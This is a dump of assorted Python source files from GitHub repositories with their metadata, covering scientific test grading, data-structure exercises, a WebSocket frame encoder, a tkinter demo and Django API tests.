gradient and laplacian errors are within tolerance\n assume wftest output contains the blocks such as:\nFor particle #0 at 2.77662296 2.025233638 3.660986223\nGradient = 6.68693298 -3.95727398 7.476365008\n Finite diff = 6.686934158 -3.957273925 7.476365603\n Error = -1.178022464e-06 -5.538599357e-08 -5.949851918e-07\n Relative Error = 1.761678288e-07 1.39959967e-08 7.95821487e-08\n\nLaplacian = -93.12287222\n Finite diff = -93.1228783\n Error = 6.076049388e-06 Relative Error = 6.524765449e-08\n\n Args:\n mm (mmap): memory map of wftest output file e.g. wftest.000\n rel_tot (float,optional): tolerance for relative error.\n val_thr (float,optional): threshold for significance of derivative, default is 1e-2. Derivatives below this threshold are treated as zero. This threhold exists because small error in a tiny value can result in a large relative error.\n header (str,optional): default is 'For particle'\n Returns:\n bool: success\n \"\"\"\n\n idx = mm.find(header.encode())\n if idx == -1:\n raise RuntimeError('failed to find %s'%header)\n # end if\n\n mm.seek(idx)\n mm.readline() # skip header\n\n success = True # determine success with the following checks\n\n # 1. 
gradient error\n idx = mm.find('Gradient'.encode())\n mm.seek(idx)\n grad_line = mm.readline().decode()\n grad_xyz = grad_line.split('=')[-1]\n try: # real values\n grad_val = map(float,grad_xyz.split())\n except: # complex values\n xyzl = re.split(r'[(,)]',grad_xyz.strip('\\n'))\n grad_real = map(float,xyzl[1::3])\n grad_imag = map(float,xyzl[2::3])\n grad_val = [grad_real[i] + 1j*grad_imag[i] for i in range(3)]\n # end try\n idx = mm.find('Relative Error'.encode())\n mm.seek(idx)\n grad_line = mm.readline().decode()\n grad_re = map(float,grad_line.split()[-3:]) # relative error\n if (sum(grad_re)>rel_tot): # check if error is significant\n if (abs(sum(grad_val))>val_thr): # ignore small absolute errors\n success = False\n # end if\n # end if\n\n # 2. laplacian error\n idx = mm.find('Laplacian'.encode())\n mm.seek(idx)\n lap_valt= mm.readline().decode().split('=')[-1]\n try: # real\n lap_val = float(lap_valt)\n except: # complex\n lapl = re.split(r'[(,)]',lap_valt.strip('\\n'))\n lap_val = float(lapl[1]) + 1j*float(lapl[2])\n # end try\n idx = mm.find('Relative Error'.encode())\n mm.seek(idx)\n lap_line = mm.readline()\n tokens = lap_line.split()\n lap_re = float(tokens[-1]) # relative error\n if (lap_re>rel_tot):\n if (abs(lap_val)>val_thr):\n success = False\n # end if\n # end if\n\n return success\n# end def\n\ndef all_lines_with_tag(mm,tag,nline_max):\n \"\"\" return a list of memory indices pointing to the start of tag \"\"\"\n mm.seek(0) # rewind file\n all_idx = []\n for iline in range(nline_max):\n idx = mm.find(tag.encode())\n if idx == -1:\n break\n # end if\n mm.seek(idx)\n all_idx.append(idx)\n mm.readline()\n # end for iline\n\n # guard\n if iline >= nline_max-1:\n raise NotImplementedError('may need to increase nline_max')\n # end if\n return all_idx\n# end def all_lines_with_tag\n\nif __name__ == '__main__':\n\n fname = 'wftest.000'\n nline_max = int(1e6) # assume fname has at most 1 million lines\n ratio_tol = 1e-6 # tolerance for ratio test\n rel_tol = 1e-3 # tolerance for relative error (0.1%)\n\n from mmap import mmap\n with open(fname,'r+') as f:\n mm = mmap(f.fileno(),0)\n # end with\n\n # 1. grade finite-difference test\n plocs = all_lines_with_tag(mm,'For particle',nline_max=nline_max)\n fsuccess = True # finite-difference test success\n for ploc in plocs:\n mm.seek(ploc)\n success = check_next_particle_grad_lap(mm,rel_tol)\n fsuccess= fsuccess&success\n # end for plocs\n\n # 2. grade ratio test\n \"\"\" use function designed for: \n Deriv Numeric Analytic Diff\n to parse:\n Particle Ratio of Ratios Computed Ratio Internal Ratio\n \"\"\"\n from check_deriv import parse_deriv_block\n data = parse_deriv_block(mm,'Particle Ratio of Ratios')\n # parse_deriv_block was not written for grad_lap, need to rename\n gl_name_map = {'Particle':'iparam','ratio':'numeric','computed':'analytic','internal':'diff'}\n rr = data[gl_name_map['ratio']]\n rsuccess = abs(sum(rr)/len(rr) - 1.) 
< ratio_tol\n\n    if fsuccess:\n        print('Finite difference test: PASS')\n    else:\n        print('Finite difference test: FAIL')\n    if rsuccess:\n        print('Ratio test: PASS')\n    else:\n        print('Ratio test: FAIL')\n\n    if fsuccess and rsuccess:\n        exit(0)\n    else:\n        exit(1)\n\n# end __main__\n","repo_name":"QMCPACK/qmcpack","sub_path":"tests/scripts/check_grad_lap.py","file_name":"check_grad_lap.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"}
+{"seq_id":"33928545370","text":"class No:\r\n\r\n    def __init__ (self, valor):\r\n        self.valor = valor\r\n        self.esquerda = None\r\n        self.direita = None\r\n\r\n    def __repr__(self):\r\n        return '%s <- %s -> %s' % (self.esquerda and self.esquerda.valor, self.valor, self.direita and self.direita.valor)\r\n\r\nclass ArvoreBinaria:\r\n    def __init__(self):\r\n        self.raiz = None\r\n    \r\n    def inserir_em_nivel(self, valor):\r\n        if self.raiz is None:\r\n            self.raiz = No(valor)\r\n        else: \r\n            self.inserir_em_nivel_recursivo(valor, self.raiz)\r\n    \r\n    def inserir_em_nivel_recursivo(self, valor, no):\r\n        if valor < no.valor:\r\n            if no.esquerda is None:\r\n                no.esquerda = No(valor)\r\n            else: \r\n                self.inserir_em_nivel_recursivo(valor, no.esquerda)\r\n        else: \r\n            if no.direita is None:\r\n                no.direita = No(valor)\r\n            else:\r\n                self.inserir_em_nivel_recursivo(valor, no.direita)\r\n\r\n\r\n    def mostrar_in_ordem(self):\r\n        if self.raiz is None:\r\n            print(\"The tree is empty!!\")\r\n            return []\r\n        else:\r\n            return self.mostrar_in_ordem_recursivo(self.raiz)\r\n\r\n    def mostrar_in_ordem_recursivo(self, no):\r\n        valores_visitados = []\r\n        if no is not None:\r\n            if no.esquerda is not None:\r\n                valores_visitados.extend(self.mostrar_in_ordem_recursivo(no.esquerda))\r\n            valores_visitados.append(no.valor)\r\n            if no.direita is not None:\r\n                valores_visitados.extend(self.mostrar_in_ordem_recursivo(no.direita))\r\n        return valores_visitados\r\n\r\n\r\n    def encontrar_Nos_Filhos(self, No_Pai):\r\n        \r\n        no_pai = self.encontrar_no(self.raiz, No_Pai)\r\n\r\n        if no_pai is None:\r\n            return [] \r\n        \r\n        Nos_Filhos = []\r\n        if no_pai.esquerda:\r\n            Nos_Filhos.append(no_pai.esquerda.valor)\r\n        if no_pai.direita:\r\n            Nos_Filhos.append(no_pai.direita.valor)\r\n\r\n        return Nos_Filhos\r\n\r\n    def encontrar_no(self, no_atual, valor_alvo):\r\n        if no_atual is None:\r\n            return None \r\n        if no_atual.valor == valor_alvo:\r\n            return no_atual \r\n        \r\n        no_esquerdo = self.encontrar_no(no_atual.esquerda, valor_alvo)\r\n        no_direito = self.encontrar_no(no_atual.direita, valor_alvo)\r\n        \r\n        return no_esquerdo or no_direito\r\n\r\n\r\n    \r\nArvore = ArvoreBinaria()\r\n\r\n\r\n\r\nArvore.inserir_em_nivel(5)\r\nArvore.inserir_em_nivel(3)\r\nArvore.inserir_em_nivel(7)\r\nArvore.inserir_em_nivel(2)\r\nArvore.inserir_em_nivel(4)\r\nArvore.inserir_em_nivel(6)\r\nArvore.inserir_em_nivel(8)\r\n\r\n\r\n\r\nNo_Pai = int(input(\"Enter the node you are looking for: \"))\r\nNos_Filhos = Arvore.encontrar_Nos_Filhos(No_Pai)\r\n\r\nif Nos_Filhos:\r\n    print(f\"The children of node {No_Pai} are: {Nos_Filhos}\")\r\nelse:\r\n    print(f\"Node {No_Pai} was not found in the tree or has no children.\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AllanOliveira2022/LISTA_ARVORE_BINARIA_N2","sub_path":"q15_Filhos.py","file_name":"q15_Filhos.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24026806105","text":"class stack:\r\n    def __init__ (self,maxsize):\r\n        
self.__maxsize=maxsize\r\n self.__elements=[None]*self.__maxsize\r\n self.__top=-1\r\n\r\n def is_full(self):\r\n if self.__top==self.__maxsize-1:\r\n return True \r\n else:\r\n return False\r\n def isempty(self):\r\n if self.__top==-1:\r\n return True\r\n return False\r\n def push(self,data):\r\n if self.is_full():\r\n print('the stack is full')\r\n else:\r\n self.__top+=1\r\n self.__elements[self.__top]=data\r\n \r\n \r\n","repo_name":"PRK007/GIET_TRAINING_PHASE-02","sub_path":"DSA_tnp/stack1.py","file_name":"stack1.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42659615475","text":"import rlutil\nimport rlargs\nimport readline\nimport pyosr\nimport uw_random\nimport numpy as np\nfrom six.moves import input\nfrom rlreanimator import reanimate\n\nclass OctoPlayer(object):\n def __init__(self, args):\n r = rlutil.create_renderer(args)\n # r.set_perturbation(uw_random.random_state(0.25))\n r.state = np.array(r.translate_to_unit_state(args.istateraw), dtype=np.float32)\n self.renderer = r\n self.rgb_shape = (len(r.views), r.pbufferWidth, r.pbufferHeight, 3)\n self.dactions = []\n self.action_magnitude = args.amag\n self.verify_magnitude = args.vmag\n self.target = None\n\n def __iter__(self):\n r = self.renderer\n while True:\n r.render_mvrgbd()\n yield np.copy(r.mvrgb.reshape(self.rgb_shape)[0])\n if self.target is None:\n texts = input(\"Goal State (W-Last)\").split()\n self.target = np.array(texts, dtype=np.float64)\n self.target[[3,4,5,6]] = self.target[[6,3,4,5]]\n self.target = r.translate_to_unit_state(self.target)\n DA = uw_random.DISCRETE_ACTION_NUMBER\n ns = np.zeros((DA,7))\n d = np.zeros((DA))\n for action in range(DA):\n nstate, _, ratio = r.transit_state(r.state,\n action,\n self.action_magnitude,\n self.verify_magnitude)\n ns[action] = nstate\n if ratio < 1e-4:\n d[action] = 999.9\n else:\n d[action] = pyosr.distance(nstate, self.target)\n print(\"\\tA {} NS {} Ratio {} D {}\".format(action, nstate, ratio, d[action]))\n best = np.argmax(d)\n bstate = ns[best]\n r.state = bstate\n\ndef main():\n pyosr.init()\n args = rlargs.parse()\n print(args)\n player = OctoPlayer(args)\n reanimate(player)\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinyazhang/PuzzleTunnelDiscovery","sub_path":"src/RL/legacy/octogui.py","file_name":"octogui.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"21"} +{"seq_id":"24362405125","text":"import sympy as sp\n\n\ndef create_polynomial(monomials):\n \"\"\"\n Create a polynomial from a list of monomials, where each monomial is represented as [degrees, coefficient].\n\n Args:\n - monomials (list of lists): List of monomials, where each monomial is represented as [degrees, coefficient].\n\n Returns:\n - sympy expression: The polynomial expression.\n \"\"\"\n\n # Make sure the list of monomials is not empty\n if monomials == []:\n return 0\n\n # Compute the number of variables\n num_variables = len(monomials[0]) - 1\n\n # Create symbolic variables in a loop and store them in a list\n variables = [sp.symbols(f'x{i}') for i in range(num_variables)]\n\n polynomial = sum(coefficient * sp.prod(var**degree\n for var, degree in zip(variables, degrees))\n for *degrees, coefficient in monomials)\n\n return polynomial\n\n# Example usage:\n# if __name__ == \"__main__\":\n\n# # List of monomials, each represented as [degrees, coefficient]\n# monomials = [[1, 2, 0, 
1], [1, 2, 3, 4]]\n\n#     # Create the polynomial\n#     polynomial = create_polynomial(monomials)\n\n#     # Print the polynomial\n#     print(\"Polynomial:\", polynomial)\n\ndict1 = {'a': 2, 'b': 1, 'c': 3}\ndict2 = {'b': 1, 'a': 2, 'c': 3}\nassert dict1 == dict2  # dict equality ignores key order","repo_name":"teresodra/VariableOrderingInCAD","sub_path":"utils/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"40836667215","text":"import sys, tables, csv, os\nfrom multiprocessing import Process, Pool\nimport mkHdfVarsForSample\n\nuseFields = ['isHomVar', 'refDepth', 'altDepth', 'totDepth',\n             'varFrac', 'tumorRef',\n             'tumorAlt', 'tumorTotDepth', 'tumorFrac',\n             'noCallSampleCount', 'Prob']\n\ndef filterRow(row, ref, alt):\n    return row['ref'].decode(\"utf-8\") == ref \\\n        and row['alt'].decode(\"utf-8\") == alt \\\n        and row['isVar'] == 1\n\ndef fix_field(field):\n    if \"'\" in str(field):\n        return field.decode(\"utf-8\")\n    return str(field)\n\ndef query_hdf(table, useFields, ref, alt, chrom, start):\n    return [ [x[uf] for uf in useFields] for x in \n             table.where('(chrom == %d) & (pos == %d)'\n                         % (chrom, start))\n             if filterRow(x, ref, alt) ]\n\ndef process_row(sample, row, table, useFields, fieldNames, fout):\n    start = int(row['start']) + 1\n    ref = row['ref']\n    alt = row['alt']\n    rawChrom = row['chrom']\n    chrom = mkHdfVarsForSample.mkNewChrom(rawChrom)\n    resLs = query_hdf(table, useFields, ref, alt, chrom, start)\n    for r in resLs:\n        print('\\t'.join([ row[x] for x in fieldNames ] + [fix_field(ff) for ff in r] + [sample]),\n              file=fout) \n\nasync def load_vars(args, gemini_file, file_handle, fout, field2idx, fieldNames):\n#    print(field2idx)\n    h5file = tables.open_file(args.hdf_file, mode=\"r\")\n    table = h5file.root.posCollection.posLs\n    # i = 0\n    # fout = \n    # print('here0')\n    # with aiofiles.open(gemini_file, mode='r') as f:\n    #     print('here1')\n    \n    \n#    async for line in f:\n    async for line in file_handle.readlines():\n        print('here0')\n        sp = line.strip().split('\\t')\n        if not sp[0] in field2idx:\n            row = {field:sp[field2idx[field]] for field in fieldNames}\n            await trio.sleep(1) #process_row(row, table, useFields, fout)\n    print(gemini_file)\n    # i += 1\n    # if i == 100:\n    #     break\n\nasync def main(args):\n    gemini_ls = (args.gemini_file_1, args.gemini_file_2, args.gemini_file_3,\n                 args.gemini_file_4, args.gemini_file_5)\n    files = [open(x) for x in gemini_ls]\n    out_files = [open(gemini_file + '.' 
+ args.sample + '.tmp', 'w')\n for gemini_file in gemini_ls]\n for afile in files:\n fieldNames = afile.readline().strip().split('\\t')\n field2idx = {field:x for x,field in enumerate(fieldNames)}\n for afile in out_files:\n print('\\t'.join(fieldNames + useFields + ['sample']), file=afile)\n\n for afile in files:\n afile.close()\n\n async with trio.open_nursery() as nursery:\n print('one')\n async with aiofiles.open(args.gemini_file_1, mode='r') as f1:\n print('two')\n async with aiofiles.open(args.gemini_file_2, mode='r') as f2:\n async with aiofiles.open(args.gemini_file_3, mode='r') as f3:\n print('spawning')\n nursery.spawn(load_vars, args, gemini_file_1, f1, out_files[0], field2idx, fieldNames)\n nursery.spawn(load_vars, args, gemini_file_2, f2, out_files[1], field2idx, fieldNames)\n nursery.spawn(load_vars, args, gemini_file_3, f3, out_files[2], field2idx, fieldNames)\n # for out_file, file_handle, gemini_file in zip(out_files, files, gemini_ls):\n # nursery.spawn(load_vars, args, gemini_file, file_handle, out_file, field2idx, fieldNames)\n\n\n for afile in out_files:\n afile.close()\n\n os.system('head -1 {} > {}'.format(args.gemini_file_1 + '.' + args.sample + '.tmp',\n args.outFile))\n for gemini_file in (args.gemini_file_1, args.gemini_file_2, args.gemini_file_3,\n args.gemini_file_4, args.gemini_file_5):\n os.system('tail -n +2 {} >> {}'.format(args.gemini_file_1 + '.' + args.sample + '.tmp',\n args.outFile))\n\ndef read_file(params):\n afile_name, out_file_name, name, hdf_file, sample = params\n afile = open(afile_name)\n out_file = open(out_file_name, 'w')\n chrom = name.split('/')[-1].split('.')[0]\n # with open('shit.' + chrom + '.' + sample, 'w') as fout:\n # print('shit', file=fout)\n # print(out_file)\n # print('test2', file=out_file)\n h5file = tables.open_file(hdf_file, mode=\"r\")\n table = h5file.root.posCollection.posLs\n\n i = 0\n# stream = curio.io.FileStream(afile)\n sp = afile.readline().strip().split('\\t')\n fieldNames = sp\n field2idx = {field:x for x,field in enumerate(fieldNames)}\n print('\\t'.join(fieldNames), file=out_file)\n# print('here')\n for line in afile:\n sp = line.strip().split('\\t')\n i += 1\n row = {field:sp[field2idx[field]] for field in fieldNames}\n process_row(sample, row, table, useFields, fieldNames, out_file)\n # print(i, name)\n # if i == 1000:\n # break\n afile.close()\n out_file.close()\n\n# class myThread(threading.Thread):\n# def __init__(self, threadID, open_file, out_file, hdf_file, sample):\n# threading.Thread.__init__(self)\n# self.threadID = threadID\n# self.open_file = open_file\n# self.out_file = out_file\n# self.hdf_file = hdf_file\n# self.sample = sample\n# def run(self):\n# read_file(self.open_file, self.out_file, self.threadID, self.hdf_file, self.sample)\n\ndef test(sample, hdf_file, files, out_file):\n# open_files = [open(afile, 'r') for afile in files]\n out_files = [afile + '.' + sample + '.tmp'\n for afile in files]\n #print('test', file=out_files[0])\n\n i = 0\n pool = Pool(processes=12)\n input_ls = []\n for open_file, out_afile in zip(files, out_files):\n args = [open_file, out_afile, 't' + str(i), hdf_file, sample]\n input_ls.append(args)\n i += 1\n result = pool.map(read_file, input_ls)\n # i += 1\n # procs.append(proc)\n # proc.start()\n # for t in procs:\n # t.join()\n\n # for afile in out_files:\n # afile.close()\n\n os.system('head -1 {} > {}'.format(files[0] + '.' + sample + '.tmp',\n out_file))\n for gemini_file in files:\n os.system('tail -n +2 {} >> {}'.format(gemini_file + '.' 
+ sample + '.tmp',\n out_file))\n # clean up tmp file\n os.system('rm ' + gemini_file + '.' + sample + '.tmp')\n\nif __name__ == \"__main__\":\n sample, hdf_file = sys.argv[1:3]\n gemini_files = sys.argv[3:-1]\n out_file = sys.argv[-1]\n\n # desc = 'Pull data for report.'\n # parser = argparse.ArgumentParser(description=desc)\n # argLs = ('sample', 'hdf_file', 'gemini_file_1', \n # 'gemini_file_2', 'gemini_file_3',\n # 'gemini_file_4', 'gemini_file_5',\n # 'out_file',)\n # for param in argLs:\n # parser.add_argument(param)\n # args = parser.parse_args()\n test(sample, hdf_file, gemini_files, out_file)\n","repo_name":"bmennis/nb_prediction","sub_path":"src/scripts/pull_hdf_mp.py","file_name":"pull_hdf_mp.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72115341172","text":"import numpy as np\nfrom utils.utils import normalizeRows\n\ndef cos_sim(a, b):\n\t\"\"\"Takes 2 vectors a, b and returns the cosine similarity according\n\tto the definition of the dot product\n\t\"\"\"\n\tdot_product = np.dot(a, b)\n\tnorm_a = np.linalg.norm(a)\n\tnorm_b = np.linalg.norm(b)\n\n\treturn dot_product / (norm_a * norm_b)\n\ndef knn(vector, matrix, k=10):\n nearest_idx = []\n\n ### YOUR CODE\n score = []\n for index, row in enumerate(matrix):\n score.append((cos_sim(row, vector), index))\n ### END YOUR CODE\n sorted_vectors = sorted(score, key=lambda x:x[0], reverse=True)\n for i in range(k):\n nearest_idx.append(sorted_vectors[i][1])\n\n return nearest_idx\n\n","repo_name":"CYP0630/NLP_Note","sub_path":"2_word_vector/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72966499252","text":"# encoding=UTF-8\n\nimport os\nimport struct\nimport array\n\nfrom websocket_exceptions import *\nfrom websocket_utils import validate_utf8\n\nSTATUS_NORMAL = 1000\nSTATUS_GOING_AWAY = 1001\nSTATUS_PROTOCOL_ERROR = 1002\nSTATUS_UNSUPPORTED_DATA_TYPE = 1003\nSTATUS_STATUS_NOT_AVAILABLE = 1005\nSTATUS_ABNORMAL_CLOSED = 1006\nSTATUS_INVALID_PAYLOAD = 1007\nSTATUS_POLOCY_VIOLATION = 1008\nSTATUS_MESSAGE_TOO_BIG = 1009\nSTATUS_INVALID_EXTENSION = 1010\nSTATUS_UNEXPECTED_CONDITION = 1011\nSTATUS_TLS_HANDSHAKE_ERROR = 1015\n\nVALID_CLOSE_STATUS = (STATUS_NORMAL,\n STATUS_GOING_AWAY,\n STATUS_PROTOCOL_ERROR,\n STATUS_UNSUPPORTED_DATA_TYPE,\n STATUS_INVALID_PAYLOAD,\n STATUS_POLOCY_VIOLATION,\n STATUS_MESSAGE_TOO_BIG,\n STATUS_INVALID_EXTENSION,\n STATUS_UNEXPECTED_CONDITION,)\n\nclass ABNF(object):\n\n OPCODE_CONT = 0x0\n OPCODE_TEXT = 0x1\n OPCODE_BINARY = 0x2\n OPCODE_CLOSE = 0x8\n OPCODE_PING = 0x9\n OPCODE_PONG = 0xa\n\n OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE, OPCODE_PING, OPCODE_PONG)\n\n LENGTH_7 = 0x7e\n LENGTH_16 = 1 << 16\n LENGTH_63 = 1 << 63\n\n def __init__(self, fin = 0, rsv1 = 0, rsv2 = 0, rsv3 = 0,\n opcode = OPCODE_TEXT, mask = 1, data = ''):\n self.fin = fin\n self.rsv1 = rsv1\n self.rsv2 = rsv2\n self.rsv3 = rsv3\n self.opcode = opcode\n self.mask = mask\n self.data = data\n self.get_mask_key = os.urandom\n\n @staticmethod\n def create_frame(data, opcode,fin = 1):\n if opcode == ABNF.OPCODE_TEXT and isinstance(data, str):\n data = data.encode('utf-8')\n\n return ABNF(fin, 0, 0, 0, opcode, 1, data)\n\n @staticmethod\n def mask(mask_key, data):\n if isinstance(mask_key, str):\n mask_key = mask_key.encode('latin-1')\n if isinstance(data, str):\n data = 
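# The knn() above scores one row at a time; the same top-k cosine lookup can
# be done in a single vectorized pass. A sketch assuming `vector` and every
# row of `matrix` are nonzero:
import numpy as np

def knn_vectorized(vector, matrix, k=10):
    sims = matrix @ vector / (np.linalg.norm(matrix, axis=1) * np.linalg.norm(vector))
    return np.argsort(-sims)[:k].tolist()

print(knn_vectorized(np.array([1.0, 0.0]), np.eye(2), k=1))  # -> [0]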
data.encode('latin-1')\n\n _m = array.array('B', mask_key)\n _d = array.array('B', data)\n for i in range(len(_d)):\n _d[i] ^= _m[i % 4]\n\n return _d.tobytes()\n\n def _get_masked(self, mask_key):\n s = ABNF.mask(mask_key, self.data)\n\n if isinstance(mask_key, str):\n mask_key = mask_key.encode('utf-8')\n\n return mask_key + s\n\n def format(self):\n if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):\n raise ValueError('not 0 or 1')\n if self.opcode not in ABNF.OPCODES:\n raise ValueError('Invalid OPCODE')\n length = len(self.data)\n if length >= ABNF.LENGTH_63:\n raise ValueError('data is too long')\n\n frame_header = chr(self.fin << 7 |\n self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4 |\n self.opcode)\n if length < ABNF.LENGTH_7:\n frame_header += chr(self.mask << 7 | length)\n frame_header = frame_header.encode('latin-1')\n elif length < ABNF.LENGTH_16:\n frame_header += chr(self.mask << 7 | 0x7e)\n frame_header = frame_header.encode('latin-1')\n frame_header += struct.pack('!H', length)\n else:\n frame_header += chr(self.mask << 7 | 0x7f)\n frame_header = frame_header.encode('latin-1')\n frame_header += struct.pack('!Q', length)\n\n if not self.mask:\n return frame_header + self.data\n else:\n mask_key = self.get_mask_key(4)\n return frame_header + self._get_masked(mask_key)\n\n def _is_valid_close_status(self, code):\n # only reads module-level VALID_CLOSE_STATUS; could be a @staticmethod\n return code in VALID_CLOSE_STATUS or (3000 <= code < 5000)\n\n def validate(self):\n if self.rsv1 or self.rsv2 or self.rsv3:\n raise WebSocketProtocolException('rsv is not implemented yet')\n\n if self.opcode not in ABNF.OPCODES:\n raise WebSocketProtocolException('Invalid opcode %r' % self.opcode)\n\n if self.opcode == ABNF.OPCODE_PING and not self.fin:\n raise WebSocketProtocolException('Invalid ping frame')\n\n if self.opcode == ABNF.OPCODE_CLOSE:\n l = len(self.data)\n if not l:\n return\n if l == 1 or l >= 126:\n raise WebSocketProtocolException('Invalid close frame')\n if l > 2 and not validate_utf8(self.data[2:]):\n raise WebSocketProtocolException('Invalid close frame')\n\n code = 256 * self.data[0] + self.data[1]\n if not self._is_valid_close_status(code):\n raise WebSocketProtocolException('Invalid close opcode')\n\n def __str__(self):\n return 'fin=' + str(self.fin) + ' opcode=' + str(self.opcode) + ' data=' + str(self.data)\n","repo_name":"gnaggnoyil/okcoin-libinterface","sub_path":"websocket_abnf.py","file_name":"websocket_abnf.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72398040693","text":"def func(n):\n counter = 0\n for i in range(n):\n l = list(map(int,input().split()))\n p1 = l[0]\n q1 = l[1]\n if p1 < q1:\n counter += 1\n if counter > 0:\n print('Happy Alex')\n else:\n print('Poor Alex')\nn = int(input())\nfunc(n)","repo_name":"bijeshofficial/coding_solutions","sub_path":"CodeForces/456A.Laptops.py","file_name":"456A.Laptops.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19989799364","text":"class Solution:\n def rotateString(self, A: str, B: str) -> bool:\n if A == \"\":\n if B == \"\":\n return True\n else:\n return False\n for idx in range(len(A)):\n newstr = A[idx+1:]+A[:idx+1]\n if B == newstr:\n return True\n return False\n 
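# The frame masking in ABNF.mask above is a 4-byte XOR keystream, so applying
# it twice with the same key restores the payload. A standalone illustration:
import array

def xor_mask(mask_key, data):
    m = array.array('B', mask_key)
    d = array.array('B', data)
    for i in range(len(d)):
        d[i] ^= m[i % 4]
    return d.tobytes()

payload = b'hello websocket'
key = b'\x01\x02\x03\x04'
assert xor_mask(key, xor_mask(key, payload)) == payload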
","repo_name":"KCbao/Leetcode_Python","sub_path":"String/796.py","file_name":"796.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22276581810","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nroot = Tk()\nroot.title(\"Checkboxes\")\n\ndef show():\n my_label = Label(root, text=var.get()) \n my_label.pack()\n\nvar = StringVar()\n\nc = Checkbutton(root, text= \"Click here to Select/Deselect\", variable=var, onvalue=\"Selected\", offvalue=\"Deselected\")\nc.deselect()\nc.pack()\n\nb = Button(root, text=\"Show Status\", command=show).pack()\n\n\nroot.mainloop()","repo_name":"NNikoGG/tkinter-gui","sub_path":"checkboxes.py","file_name":"checkboxes.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23702666397","text":"import logging\nfrom unittest import mock\nfrom unittest.mock import MagicMock\n\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom eth_account import Account\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom ..clients import CannotGetPrice\nfrom ..services.price_service import PriceService\n\nlogger = logging.getLogger(__name__)\n\n\nclass TestTokenViews(APITestCase):\n ganache_chain_id = 1337\n\n @mock.patch.object(timezone, \"now\", return_value=timezone.now())\n def test_token_price_view(self, timezone_now_mock: MagicMock):\n chain_id = 1\n invalid_address = \"0x1234\"\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n invalid_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\"arguments\": [chain_id], \"code\": 2, \"message\": \"Chain is not supported\"},\n )\n\n chain_id = self.ganache_chain_id\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n invalid_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\n \"arguments\": [invalid_address],\n \"code\": 1,\n \"message\": \"Invalid ethereum address\",\n },\n )\n\n valid_address = Account.create().address\n with mock.patch.object(\n PriceService,\n \"get_token_eth_value_from_oracles\",\n return_value=4815,\n autospec=True,\n ) as get_token_eth_value_from_oracles_mock:\n with mock.patch.object(\n PriceService, \"get_native_coin_usd_price\", return_value=3, autospec=True\n ) as get_native_coin_usd_price_mock:\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n valid_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.data,\n {\n \"fiat_code\": \"USD\",\n \"fiat_price\": str(\n get_token_eth_value_from_oracles_mock.return_value\n * get_native_coin_usd_price_mock.return_value\n ),\n \"timestamp\": timezone_now_mock.return_value.isoformat().replace(\n \"+00:00\", \"Z\"\n ),\n },\n )\n\n @mock.patch.object(\n PriceService, \"get_native_coin_usd_price\", return_value=321.2, autospec=True\n )\n def test_token_price_view_address_0(\n self, get_native_coin_usd_price_mock: MagicMock\n ):\n chain_id = 1\n token_address = \"0x0000000000000000000000000000000000000000\"\n\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n 
